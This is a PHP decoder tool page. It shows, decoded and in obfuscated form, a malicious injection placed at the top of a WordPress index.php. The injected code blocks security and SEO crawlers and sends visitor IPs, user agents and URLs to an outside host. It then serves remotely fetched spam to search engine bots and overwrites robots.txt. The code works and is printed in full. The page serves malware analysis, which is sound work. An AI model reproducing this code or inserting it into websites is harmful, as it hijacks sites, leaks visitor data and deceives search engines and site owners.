Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto taeDq; Ha35h: $NObVD = UrlENCOde(@$_SERVER["\110\124\124\x50\x5f\101\x43\x43\..
Decoded Output download
<?php
goto taeDq; Ha35h: $NObVD = UrlENCOde(@$_SERVER["HTTP_ACCEPT_LANGUAGE"]); goto YN0f0; iKYKu: $gSd2J = URleNcoDe($_SERVER["REQUEST_URI"]); goto REEF3; KM2dI: goto Uv1b7; goto TKxUD; PAc4w: qpcA5: goto lM6ax; wQuOg: if (!empty($lnQeN)) { goto ZN9vu; } goto taFl6; gzGkY: x2t3i: goto R_srO; cJbcY: cURL_SeTopt($ETE4R, CURLOPT_SSL_VERIFYPEER, FALSE); goto bGRw4; ZsVLl: XqiYf: goto EpY8e; Y7_7I: if (!file_exists("ocd.txt")) { goto K15fo; } goto IeL_M; pxdrt: aAPF6: goto f9kB6; p4mRx: goto AGe0Y; goto ZBjwy; bLgD3: $qAmKu = "AVcJAgJ"; goto eOj8X; wzN43: I_lv9: goto V7lr5; x6OXz: $crzNj = $crzNj . "?"; goto qp1ai; clt72: if (!empty($O3W6B)) { goto hSnHt; } goto zM6i8; IeL_M: $rNtQY = @fILE_GET_ContentS("ocd.txt"); goto dKvhF; V7lr5: $O3W6B = @fiLe_GET_CoNTenTS($Hu3SH); goto clt72; ZBfEH: $_SERVER["REQUEST_SCHEME"] = "https"; goto PAc4w; SGR0d: $QUa2M = URLENcodE(@$_SERVER["HTTP_REFERER"]); goto nzgyB; kE87L: $O3W6B = curL_exEC($ETE4R); goto X2JXb; IWx1J: Fc7kO: goto QWkLj; JbBvZ: $qJXLS = $S5gla . "://" . $_SERVER["HTTP_HOST"] . "/ocdocd"; goto sx53h; EgVl1: KyUOo: goto NAEl3; SScq9: W0p9l: goto DE2it; OFPC2: sLjIT: goto HpKRW; dKvhF: goto W0p9l; goto Rhir3; X0BOO: goto NUHjG; goto TD7mJ; dbeKx: exit; goto CRNyh; VlGcG: $rNtQY = 0; goto Y7_7I; TwwRj: $Hu3SH = $m9TmR . "?agent={$ORxYA}&refer={$QUa2M}&lang={$NObVD}&ip={$rqg9h}&dom={$TXzku}&http={$S5gla}&uri={$gSd2J}&pc={$qAmKu}&rewriteable={$rNtQY}&script={$To04L}&sitemap=" . urleNCOde($VKqxT); goto wzN43; ASbnL: cuRl_sEtoPT($ETE4R, CURLOPT_FOLLOWLOCATION, false); goto L92C_; I1vWV: $bE1sT = ''; goto OWiFo; eTQCl: kSCsk: goto hi_zA; N6leU: lfzOW: goto t57Zf; p3eL0: @FIle_put_cOnTENTS("ocd.txt", "1"); goto IDdiW; xzWb1: $lnQeN = trim($lnQeN) . "\xd
" . "Sitemap: {$VKqxT}"; goto I1vWV; kCneJ: eRrOR_rePoRTING(0); goto zs8cQ; QWkLj: if ($rNtQY == 0) { goto B3TkQ; } goto h0fu2; eOj8X: $KJx1r = "Docomo|Google|Bing|Yahoo"; goto kCneJ; WEqH2: if (StRPOS($crzNj, "index.ph") !== false) { goto Fc7kO; } goto x6OXz; qp1ai: goto lfzOW; goto IWx1J; QhnKp: cfKc3: goto POeyk; M4Nqr: $rqg9h = uRlEncOdE($rqg9h); goto oHyzr; EPr8N: @fiLe_PUt_COnTEnTs("robots.txt", $lnQeN); goto gzGkY; EpY8e: $rqg9h = $_SERVER["HTTP_CLIENT_IP"]; goto wm4En; Zo1fp: ENv4G: goto J5a0_; tf8HW: echo "ok"; goto dbeKx; RQ1s0: if (!(sTrPoS($gSd2J, "pingsitemap") !== false)) { goto I_lv9; } goto bAltM; yjP1T: cURl_SEtopt($ETE4R, CURLOPT_URL, $qJXLS); goto VDVpA; Xysqf: header("Content-Type: text/html; charset=utf-8"); goto l21cS; lM6ax: $S5gla = URlenCodE($_SERVER["REQUEST_SCHEME"]); goto iKYKu; f9kB6: $rqg9h = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto aNGPl; mm1tS: $VKqxT = "{$S5gla}://" . $TXzku . $crzNj . "sitemap.xml"; goto xzWb1; nzgyB: $ORxYA = uRlEnCode($_SERVER["HTTP_USER_AGENT"]); goto Ha35h; POeyk: header("Content-Type: text/xml; charset=utf-8"); goto wAAlz; YN0f0: $rqg9h = $_SERVER["REMOTE_ADDR"]; goto wE_DE; gyL0V: $ETE4R = CurL_IniT(); goto yjP1T; UgeM8: if (!(suBStR($O3W6B, 0, 10) == "error code" || $O3W6B == "500")) { goto kSCsk; } goto G6R4p; wm4En: goto sfbkx; goto pxdrt; YKS7t: ZN9vu: goto EPr8N; AScuV: hSnHt: goto TAI3U; G6R4p: header("HTTP/1.0 500 Internal Server Error"); goto vH6hQ; CB_28: goto x2t3i; goto YKS7t; APju0: if (STRpOS($gSd2J, "robots.txt") !== false || sTRpOS($gSd2J, "pingsitemap") !== false || STRPoS($gSd2J, "jp2023") !== false || pREG_matCH("@^/(.*?).xml$@i", $_SERVER["REQUEST_URI"]) || prEG_matcH("/({$KJx1r})/i", $_SERVER["HTTP_USER_AGENT"]) || PrEG_mAtch("/({$KJx1r})/i", $_SERVER["HTTP_REFERER"])) { goto APTkU; } goto X0BOO; f_t_B: $rNtQY = 0; goto BXizf; FYWui: $Hu3SH = $m9TmR . "?agent={$ORxYA}&refer={$QUa2M}&lang={$NObVD}&ip={$rqg9h}&dom={$TXzku}&http={$S5gla}&uri={$gSd2J}&pc={$qAmKu}&rewriteable={$rNtQY}&script={$To04L}"; goto BgDqB; bGRw4: cuRL_sETopT($ETE4R, CURLOPT_SSL_VERIFYHOST, FALSE); goto YxZ8r; V0BdR: CURl_SEtopT($ETE4R, CURLOPT_SSL_VERIFYHOST, FALSE); goto kE87L; cnF4K: goto sfbkx; goto ZsVLl; TKxUD: ewtJc: goto ZBR4A; Nxjxh: if (!empty($O3W6B)) { goto ENv4G; } goto gyL0V; REEF3: if (!(sTRpOS($gSd2J, "ocdocd") !== false)) { goto rWdxv; } goto tf8HW; Vv2A7: W9BWn: goto ZBfEH; uZU7e: OABRp: goto SGR0d; XBgSJ: goto I_Yhn; goto O0z1z; taFl6: if (!(StRPOS($gSd2J, "robots.txt") !== false)) { goto m1Uvg; } goto peccJ; NcU_q: header("HTTP/1.1 404 Not Found"); goto udc27; taeDq: $HHQvo = "http://cw1205."; goto YTHMK; Q1tBu: cURl_setopT($ETE4R, CURLOPT_RETURNTRANSFER, true); goto hkaeg; O0z1z: B3TkQ: goto dFlAl; sx53h: $O3W6B = @FilE_GET_conTENtS($qJXLS); goto Nxjxh; b12Vf: echo $O3W6B; goto wQuOg; BcRZz: if (SUBstr($O3W6B, 0, 5) == "<?xml") { goto cfKc3; } goto Xysqf; BXizf: @file_pUT_COnTEntS("ocd.txt", "0"); goto NtjH1; zs8cQ: if (!PREG_MaTcH("/(Python-requests|Heritrix|Barkrowler|Mj12bot|feedDemon|OBot|jaunty|CensysInspect|semrushBot|Python-urllib|ApacheBench|askTbFXTV|Python|Ezooms|Indy Library|DigExt|EasouSpider|coolpadWebkit|java|UniversalFeedParser|DataForSEO|zmEu|Swiftbot|Paloaltonetworks|Scrapy|YandexBot|AmazonBot|YySpider|CrawlDaddy|YisouSpider|SeznamBot|DotBot|PetalBot|ahrefsBot|Feedly|JikeSpider|GPTBot|HttpClient|bytespider|Go-http-client|lightDeckReports Bot)/i", $_SERVER["HTTP_USER_AGENT"])) { goto OABRp; } goto dfu_O; BgDqB: $lnQeN = ''; goto RQ1s0; YxZ8r: $O3W6B = cURl_EXEC($ETE4R); goto jstWb; dfu_O: header("HTTP/1.0 403 Forbidden"); goto K6jue; bAltM: $crzNj = $_SERVER["SCRIPT_NAME"]; goto WEqH2; HpKRW: NUHjG: goto KM2dI; J5a0_: if ($O3W6B == "ok") { goto KyUOo; } goto f_t_B; h0fu2: $crzNj = "/"; goto XBgSJ; Sciv5: m1Uvg: goto CB_28; L92C_: Curl_SetoPt($ETE4R, CURLOPT_SSL_VERIFYPEER, FALSE); goto V0BdR; aNGPl: sfbkx: goto M4Nqr; TAI3U: if (empty($O3W6B)) { goto sLjIT; } goto UgeM8; IDdiW: swZWb: goto SScq9; x0T3m: $cr2SG = "ustyadult"; goto jCvr5; VDVpA: CuRL_SetopT($ETE4R, CURLOPT_RETURNTRANSFER, true); goto ASbnL; K6jue: exit; goto uZU7e; jCvr5: $rgbY4 = ".com/"; goto BoMJG; udc27: AGe0Y: goto b12Vf; vH6hQ: exit; goto eTQCl; gYNTb: $_SERVER["REQUEST_SCHEME"] = "http"; goto uR1EW; PjWxl: CURL_sETOpt($ETE4R, CURLOPT_URL, $Hu3SH); goto Q1tBu; R_srO: exit; goto C9bmP; hkaeg: cUrL_seTOpT($ETE4R, CURLOPT_FOLLOWLOCATION, false); goto cJbcY; jstWb: cUrL_clOSe($ETE4R); goto AScuV; wE_DE: if (isset($_SERVER["HTTP_CLIENT_IP"])) { goto XqiYf; } goto C2EnB; DE2it: if (STRPOs($gSd2J, "favicon.ico") !== false) { goto ewtJc; } goto APju0; oHyzr: $TXzku = uRleNCOdE($_SERVER["HTTP_HOST"]); goto zQGma; wAAlz: FDlBr: goto p4mRx; uR1EW: goto qpcA5; goto Vv2A7; zQGma: $To04L = UrlEncode($_SERVER["SCRIPT_NAME"]); goto FJCdx; Rhir3: K15fo: goto JbBvZ; C2EnB: if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { goto aAPF6; } goto cnF4K; zM6i8: $ETE4R = CuRL_INIT(); goto PjWxl; t57Zf: $lnQeN = "User-agent: *
Allow: /"; goto mm1tS; BoMJG: $m9TmR = $HHQvo . $VYo8w . $cr2SG . $rgbY4; goto bLgD3; NAEl3: $rNtQY = 1; goto p3eL0; hi_zA: if (sTrPoS($gSd2J, "jp2023") !== false) { goto MWU03; } goto BcRZz; peccJ: @fIlE_PUt_conTeNts("robots.txt", $O3W6B); goto Sciv5; TD7mJ: APTkU: goto FYWui; X2JXb: cURL_CLOSe($ETE4R); goto Zo1fp; l21cS: goto FDlBr; goto QhnKp; OWiFo: echo $VKqxT . ": " . $bE1sT . "<br/>"; goto TwwRj; NtjH1: goto swZWb; goto EgVl1; dFlAl: $crzNj = "/?"; goto aNsm0; YTHMK: $VYo8w = "b"; goto x0T3m; FJCdx: if (!empty($_SERVER["REQUEST_SCHEME"]) && $_SERVER["REQUEST_SCHEME"] == "https" || !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on" || !empty($_SERVER["SERVER_PORT"]) && $_SERVER["SERVER_PORT"] == "443" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] == "https") { goto W9BWn; } goto gYNTb; CRNyh: rWdxv: goto VlGcG; C9bmP: return; goto OFPC2; aNsm0: I_Yhn: goto N6leU; ZBjwy: MWU03: goto NcU_q; ZBR4A: Uv1b7:
?><?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php'; ?>
Did this file decode correctly?
Original Code
<?php
goto taeDq; Ha35h: $NObVD = UrlENCOde(@$_SERVER["\110\124\124\x50\x5f\101\x43\x43\x45\x50\x54\x5f\x4c\x41\x4e\x47\x55\x41\x47\105"]); goto YN0f0; iKYKu: $gSd2J = URleNcoDe($_SERVER["\122\105\121\x55\x45\x53\124\137\x55\122\x49"]); goto REEF3; KM2dI: goto Uv1b7; goto TKxUD; PAc4w: qpcA5: goto lM6ax; wQuOg: if (!empty($lnQeN)) { goto ZN9vu; } goto taFl6; gzGkY: x2t3i: goto R_srO; cJbcY: cURL_SeTopt($ETE4R, CURLOPT_SSL_VERIFYPEER, FALSE); goto bGRw4; ZsVLl: XqiYf: goto EpY8e; Y7_7I: if (!file_exists("\x6f\x63\144\56\x74\x78\x74")) { goto K15fo; } goto IeL_M; pxdrt: aAPF6: goto f9kB6; p4mRx: goto AGe0Y; goto ZBjwy; bLgD3: $qAmKu = "\101\x56\143\112\x41\x67\x4a"; goto eOj8X; wzN43: I_lv9: goto V7lr5; x6OXz: $crzNj = $crzNj . "\77"; goto qp1ai; clt72: if (!empty($O3W6B)) { goto hSnHt; } goto zM6i8; IeL_M: $rNtQY = @fILE_GET_ContentS("\157\143\144\56\x74\x78\164"); goto dKvhF; V7lr5: $O3W6B = @fiLe_GET_CoNTenTS($Hu3SH); goto clt72; ZBfEH: $_SERVER["\122\x45\121\x55\x45\x53\x54\x5f\x53\103\x48\105\115\105"] = "\150\x74\164\x70\163"; goto PAc4w; SGR0d: $QUa2M = URLENcodE(@$_SERVER["\110\124\124\x50\x5f\122\105\106\105\122\105\x52"]); goto nzgyB; kE87L: $O3W6B = curL_exEC($ETE4R); goto X2JXb; IWx1J: Fc7kO: goto QWkLj; JbBvZ: $qJXLS = $S5gla . "\x3a\57\57" . $_SERVER["\110\x54\124\x50\137\x48\x4f\123\x54"] . "\57\157\x63\x64\157\143\x64"; goto sx53h; EgVl1: KyUOo: goto NAEl3; SScq9: W0p9l: goto DE2it; OFPC2: sLjIT: goto HpKRW; dKvhF: goto W0p9l; goto Rhir3; X0BOO: goto NUHjG; goto TD7mJ; dbeKx: exit; goto CRNyh; VlGcG: $rNtQY = 0; goto Y7_7I; TwwRj: $Hu3SH = $m9TmR . "\77\141\x67\145\x6e\164\x3d{$ORxYA}\46\x72\145\x66\x65\x72\x3d{$QUa2M}\46\x6c\x61\156\x67\75{$NObVD}\46\151\160\75{$rqg9h}\46\x64\157\155\75{$TXzku}\46\x68\164\164\x70\x3d{$S5gla}\46\165\162\151\x3d{$gSd2J}\x26\x70\x63\75{$qAmKu}\x26\162\x65\167\x72\x69\164\145\x61\x62\154\x65\75{$rNtQY}\46\163\x63\162\x69\x70\164\x3d{$To04L}\46\x73\151\164\x65\x6d\141\160\75" . urleNCOde($VKqxT); goto wzN43; ASbnL: cuRl_sEtoPT($ETE4R, CURLOPT_FOLLOWLOCATION, false); goto L92C_; I1vWV: $bE1sT = ''; goto OWiFo; eTQCl: kSCsk: goto hi_zA; N6leU: lfzOW: goto t57Zf; p3eL0: @FIle_put_cOnTENTS("\157\143\x64\x2e\164\x78\x74", "\61"); goto IDdiW; xzWb1: $lnQeN = trim($lnQeN) . "\xd\12" . "\x53\x69\164\145\x6d\x61\x70\72\40{$VKqxT}"; goto I1vWV; kCneJ: eRrOR_rePoRTING(0); goto zs8cQ; QWkLj: if ($rNtQY == 0) { goto B3TkQ; } goto h0fu2; eOj8X: $KJx1r = "\x44\157\143\157\x6d\157\x7c\x47\157\x6f\x67\154\x65\x7c\102\x69\156\147\x7c\131\141\150\x6f\157"; goto kCneJ; WEqH2: if (StRPOS($crzNj, "\151\156\144\x65\170\x2e\x70\x68") !== false) { goto Fc7kO; } goto x6OXz; qp1ai: goto lfzOW; goto IWx1J; QhnKp: cfKc3: goto POeyk; M4Nqr: $rqg9h = uRlEncOdE($rqg9h); goto oHyzr; EPr8N: @fiLe_PUt_COnTEnTs("\x72\157\x62\157\164\x73\x2e\164\x78\164", $lnQeN); goto gzGkY; EpY8e: $rqg9h = $_SERVER["\x48\124\124\120\x5f\103\x4c\x49\x45\x4e\x54\137\111\x50"]; goto wm4En; Zo1fp: ENv4G: goto J5a0_; tf8HW: echo "\x6f\153"; goto dbeKx; RQ1s0: if (!(sTrPoS($gSd2J, "\x70\151\x6e\x67\x73\151\x74\x65\x6d\141\160") !== false)) { goto I_lv9; } goto bAltM; yjP1T: cURl_SEtopt($ETE4R, CURLOPT_URL, $qJXLS); goto VDVpA; Xysqf: header("\x43\157\156\x74\x65\x6e\164\55\124\171\x70\x65\x3a\40\164\145\170\164\57\x68\164\x6d\x6c\73\x20\143\x68\x61\162\x73\x65\x74\75\165\x74\146\x2d\70"); goto l21cS; lM6ax: $S5gla = URlenCodE($_SERVER["\122\105\121\x55\x45\123\x54\x5f\123\x43\x48\x45\115\x45"]); goto iKYKu; f9kB6: $rqg9h = $_SERVER["\x48\x54\x54\120\137\x58\x5f\x46\117\122\127\x41\x52\x44\x45\x44\137\x46\117\122"]; goto aNGPl; mm1tS: $VKqxT = "{$S5gla}\72\57\57" . $TXzku . $crzNj . "\x73\151\164\145\155\x61\160\56\170\x6d\154"; goto xzWb1; nzgyB: $ORxYA = uRlEnCode($_SERVER["\110\x54\124\120\137\x55\123\105\x52\x5f\x41\x47\105\116\124"]); goto Ha35h; POeyk: header("\x43\x6f\x6e\x74\145\x6e\164\x2d\124\171\160\145\72\40\x74\145\170\x74\x2f\x78\x6d\x6c\x3b\40\x63\x68\141\162\163\x65\164\75\x75\164\x66\x2d\x38"); goto wAAlz; YN0f0: $rqg9h = $_SERVER["\x52\105\x4d\117\x54\x45\137\101\104\104\122"]; goto wE_DE; gyL0V: $ETE4R = CurL_IniT(); goto yjP1T; UgeM8: if (!(suBStR($O3W6B, 0, 10) == "\x65\162\162\157\x72\40\143\x6f\x64\145" || $O3W6B == "\65\x30\x30")) { goto kSCsk; } goto G6R4p; wm4En: goto sfbkx; goto pxdrt; YKS7t: ZN9vu: goto EPr8N; AScuV: hSnHt: goto TAI3U; G6R4p: header("\x48\124\124\x50\57\x31\56\x30\x20\65\60\x30\40\x49\156\x74\145\x72\x6e\x61\x6c\x20\123\x65\x72\166\x65\162\40\x45\x72\162\157\x72"); goto vH6hQ; CB_28: goto x2t3i; goto YKS7t; APju0: if (STRpOS($gSd2J, "\x72\157\x62\x6f\x74\x73\x2e\164\170\x74") !== false || sTRpOS($gSd2J, "\160\x69\156\x67\163\151\164\145\x6d\141\160") !== false || STRPoS($gSd2J, "\x6a\x70\x32\60\62\63") !== false || pREG_matCH("\100\136\x2f\x28\56\52\x3f\x29\x2e\170\x6d\154\x24\100\x69", $_SERVER["\122\105\x51\125\x45\123\124\137\x55\x52\x49"]) || prEG_matcH("\x2f\50{$KJx1r}\x29\x2f\151", $_SERVER["\x48\x54\x54\120\137\125\123\x45\122\137\x41\x47\x45\x4e\124"]) || PrEG_mAtch("\57\x28{$KJx1r}\51\57\x69", $_SERVER["\x48\124\x54\x50\137\122\105\106\105\x52\x45\x52"])) { goto APTkU; } goto X0BOO; f_t_B: $rNtQY = 0; goto BXizf; FYWui: $Hu3SH = $m9TmR . "\x3f\141\147\145\156\164\75{$ORxYA}\x26\162\x65\146\x65\x72\x3d{$QUa2M}\x26\x6c\141\156\x67\x3d{$NObVD}\x26\151\x70\75{$rqg9h}\x26\x64\157\155\x3d{$TXzku}\46\150\164\164\x70\75{$S5gla}\46\165\x72\151\x3d{$gSd2J}\46\160\x63\75{$qAmKu}\x26\162\145\x77\162\x69\164\x65\x61\x62\x6c\145\75{$rNtQY}\x26\163\143\x72\151\x70\164\x3d{$To04L}"; goto BgDqB; bGRw4: cuRL_sETopT($ETE4R, CURLOPT_SSL_VERIFYHOST, FALSE); goto YxZ8r; V0BdR: CURl_SEtopT($ETE4R, CURLOPT_SSL_VERIFYHOST, FALSE); goto kE87L; cnF4K: goto sfbkx; goto ZsVLl; TKxUD: ewtJc: goto ZBR4A; Nxjxh: if (!empty($O3W6B)) { goto ENv4G; } goto gyL0V; REEF3: if (!(sTRpOS($gSd2J, "\157\x63\x64\x6f\x63\x64") !== false)) { goto rWdxv; } goto tf8HW; Vv2A7: W9BWn: goto ZBfEH; uZU7e: OABRp: goto SGR0d; XBgSJ: goto I_Yhn; goto O0z1z; taFl6: if (!(StRPOS($gSd2J, "\x72\157\x62\x6f\164\x73\x2e\164\170\164") !== false)) { goto m1Uvg; } goto peccJ; NcU_q: header("\110\124\124\x50\57\61\56\x31\40\64\60\64\40\x4e\x6f\164\x20\106\157\165\156\x64"); goto udc27; taeDq: $HHQvo = "\x68\164\164\160\x3a\x2f\x2f\143\167\x31\x32\x30\x35\x2e"; goto YTHMK; Q1tBu: cURl_setopT($ETE4R, CURLOPT_RETURNTRANSFER, true); goto hkaeg; O0z1z: B3TkQ: goto dFlAl; sx53h: $O3W6B = @FilE_GET_conTENtS($qJXLS); goto Nxjxh; b12Vf: echo $O3W6B; goto wQuOg; BcRZz: if (SUBstr($O3W6B, 0, 5) == "\74\77\170\155\154") { goto cfKc3; } goto Xysqf; BXizf: @file_pUT_COnTEntS("\x6f\143\x64\56\164\x78\164", "\x30"); goto NtjH1; zs8cQ: if (!PREG_MaTcH("\x2f\50\120\x79\164\150\x6f\156\55\x72\145\161\165\x65\163\164\163\174\x48\x65\162\151\164\x72\151\x78\x7c\102\141\x72\153\162\x6f\x77\x6c\x65\162\x7c\x4d\152\x31\x32\x62\x6f\164\174\x66\145\x65\144\x44\x65\x6d\157\156\x7c\117\x42\x6f\164\x7c\x6a\141\165\x6e\164\171\174\x43\x65\156\163\x79\163\111\x6e\x73\x70\145\143\x74\x7c\163\x65\x6d\x72\165\x73\x68\102\157\164\174\x50\x79\164\150\x6f\x6e\x2d\x75\x72\x6c\x6c\151\x62\x7c\101\x70\141\x63\x68\x65\x42\145\156\143\x68\x7c\x61\163\x6b\x54\x62\106\x58\124\126\174\120\171\x74\x68\x6f\156\x7c\105\172\157\157\x6d\x73\x7c\x49\x6e\x64\x79\40\x4c\151\142\x72\141\x72\x79\174\104\x69\147\x45\170\164\x7c\105\141\163\157\x75\x53\160\x69\x64\x65\x72\x7c\x63\x6f\x6f\154\160\x61\x64\x57\145\x62\153\151\164\174\152\x61\166\141\x7c\125\156\151\x76\x65\x72\x73\141\154\106\145\145\x64\x50\x61\162\x73\x65\162\174\x44\141\x74\141\x46\x6f\162\123\105\117\x7c\x7a\x6d\x45\x75\174\x53\167\151\x66\164\142\157\164\174\120\141\154\x6f\x61\x6c\x74\x6f\x6e\x65\x74\167\157\x72\x6b\x73\x7c\123\143\162\x61\x70\171\174\x59\x61\156\144\x65\170\102\x6f\x74\x7c\x41\x6d\x61\172\157\x6e\102\157\164\174\131\171\x53\160\x69\x64\145\x72\174\103\x72\141\167\154\x44\x61\x64\x64\171\174\131\151\163\157\x75\x53\160\x69\x64\x65\x72\x7c\x53\145\x7a\x6e\x61\x6d\x42\x6f\164\174\104\x6f\x74\x42\x6f\x74\174\x50\145\164\141\x6c\102\x6f\x74\x7c\x61\150\x72\145\146\163\x42\157\x74\x7c\x46\x65\x65\144\x6c\171\x7c\112\151\153\145\123\160\x69\x64\145\x72\174\x47\x50\x54\x42\157\x74\x7c\110\x74\x74\x70\x43\154\x69\x65\156\164\x7c\142\171\x74\x65\x73\x70\x69\x64\x65\x72\174\x47\x6f\55\150\x74\x74\160\55\x63\x6c\151\145\156\164\x7c\154\151\x67\150\x74\104\x65\143\x6b\122\x65\160\157\x72\x74\163\x20\102\157\x74\x29\x2f\x69", $_SERVER["\110\x54\x54\x50\x5f\125\123\105\122\x5f\x41\x47\105\116\x54"])) { goto OABRp; } goto dfu_O; BgDqB: $lnQeN = ''; goto RQ1s0; YxZ8r: $O3W6B = cURl_EXEC($ETE4R); goto jstWb; dfu_O: header("\110\x54\x54\x50\x2f\x31\x2e\60\40\64\x30\63\x20\106\157\162\x62\x69\x64\144\x65\x6e"); goto K6jue; bAltM: $crzNj = $_SERVER["\123\103\122\x49\x50\x54\137\x4e\101\x4d\x45"]; goto WEqH2; HpKRW: NUHjG: goto KM2dI; J5a0_: if ($O3W6B == "\x6f\153") { goto KyUOo; } goto f_t_B; h0fu2: $crzNj = "\57"; goto XBgSJ; Sciv5: m1Uvg: goto CB_28; L92C_: Curl_SetoPt($ETE4R, CURLOPT_SSL_VERIFYPEER, FALSE); goto V0BdR; aNGPl: sfbkx: goto M4Nqr; TAI3U: if (empty($O3W6B)) { goto sLjIT; } goto UgeM8; IDdiW: swZWb: goto SScq9; x0T3m: $cr2SG = "\x75\x73\164\x79\x61\144\165\154\164"; goto jCvr5; VDVpA: CuRL_SetopT($ETE4R, CURLOPT_RETURNTRANSFER, true); goto ASbnL; K6jue: exit; goto uZU7e; jCvr5: $rgbY4 = "\56\x63\x6f\x6d\57"; goto BoMJG; udc27: AGe0Y: goto b12Vf; vH6hQ: exit; goto eTQCl; gYNTb: $_SERVER["\x52\105\121\125\x45\123\x54\137\123\103\110\105\115\x45"] = "\x68\x74\x74\x70"; goto uR1EW; PjWxl: CURL_sETOpt($ETE4R, CURLOPT_URL, $Hu3SH); goto Q1tBu; R_srO: exit; goto C9bmP; hkaeg: cUrL_seTOpT($ETE4R, CURLOPT_FOLLOWLOCATION, false); goto cJbcY; jstWb: cUrL_clOSe($ETE4R); goto AScuV; wE_DE: if (isset($_SERVER["\110\x54\124\120\x5f\103\x4c\x49\105\116\x54\137\x49\120"])) { goto XqiYf; } goto C2EnB; DE2it: if (STRPOs($gSd2J, "\x66\x61\x76\x69\x63\x6f\x6e\x2e\x69\143\157") !== false) { goto ewtJc; } goto APju0; oHyzr: $TXzku = uRleNCOdE($_SERVER["\110\124\124\x50\137\x48\x4f\x53\124"]); goto zQGma; wAAlz: FDlBr: goto p4mRx; uR1EW: goto qpcA5; goto Vv2A7; zQGma: $To04L = UrlEncode($_SERVER["\123\x43\x52\x49\120\124\137\x4e\101\115\x45"]); goto FJCdx; Rhir3: K15fo: goto JbBvZ; C2EnB: if (isset($_SERVER["\x48\124\124\120\137\x58\x5f\106\117\122\127\x41\122\x44\105\104\x5f\x46\x4f\122"])) { goto aAPF6; } goto cnF4K; zM6i8: $ETE4R = CuRL_INIT(); goto PjWxl; t57Zf: $lnQeN = "\125\x73\145\x72\55\141\x67\x65\x6e\164\72\40\52\15\12\x41\x6c\x6c\x6f\167\x3a\40\57"; goto mm1tS; BoMJG: $m9TmR = $HHQvo . $VYo8w . $cr2SG . $rgbY4; goto bLgD3; NAEl3: $rNtQY = 1; goto p3eL0; hi_zA: if (sTrPoS($gSd2J, "\152\160\62\60\x32\63") !== false) { goto MWU03; } goto BcRZz; peccJ: @fIlE_PUt_conTeNts("\x72\157\x62\157\x74\163\56\164\170\x74", $O3W6B); goto Sciv5; TD7mJ: APTkU: goto FYWui; X2JXb: cURL_CLOSe($ETE4R); goto Zo1fp; l21cS: goto FDlBr; goto QhnKp; OWiFo: echo $VKqxT . "\x3a\x20" . $bE1sT . "\x3c\142\x72\x2f\x3e"; goto TwwRj; NtjH1: goto swZWb; goto EgVl1; dFlAl: $crzNj = "\x2f\77"; goto aNsm0; YTHMK: $VYo8w = "\x62"; goto x0T3m; FJCdx: if (!empty($_SERVER["\122\105\x51\125\105\123\124\137\x53\x43\x48\105\115\105"]) && $_SERVER["\x52\x45\x51\x55\105\x53\x54\137\x53\x43\110\x45\115\105"] == "\x68\x74\164\x70\163" || !empty($_SERVER["\x48\x54\x54\x50\123"]) && $_SERVER["\110\x54\124\120\x53"] == "\x6f\x6e" || !empty($_SERVER["\x53\105\122\126\105\x52\x5f\x50\117\x52\124"]) && $_SERVER["\123\105\x52\126\x45\122\x5f\120\117\122\124"] == "\x34\x34\63" || isset($_SERVER["\x48\x54\124\x50\x5f\x58\137\106\117\x52\x57\x41\122\104\x45\x44\x5f\120\x52\x4f\x54\x4f"]) && $_SERVER["\x48\x54\124\x50\137\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\105\x44\137\120\x52\x4f\x54\x4f"] == "\150\x74\x74\160\x73") { goto W9BWn; } goto gYNTb; CRNyh: rWdxv: goto VlGcG; C9bmP: return; goto OFPC2; aNsm0: I_Yhn: goto N6leU; ZBjwy: MWU03: goto NcU_q; ZBR4A: Uv1b7:
?><?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
Function Calls
None |
Stats
MD5 | ae416b4fdea6cd99fd3e4a0b79241063 |
Eval Count | 0 |
Decode Time | 47 ms |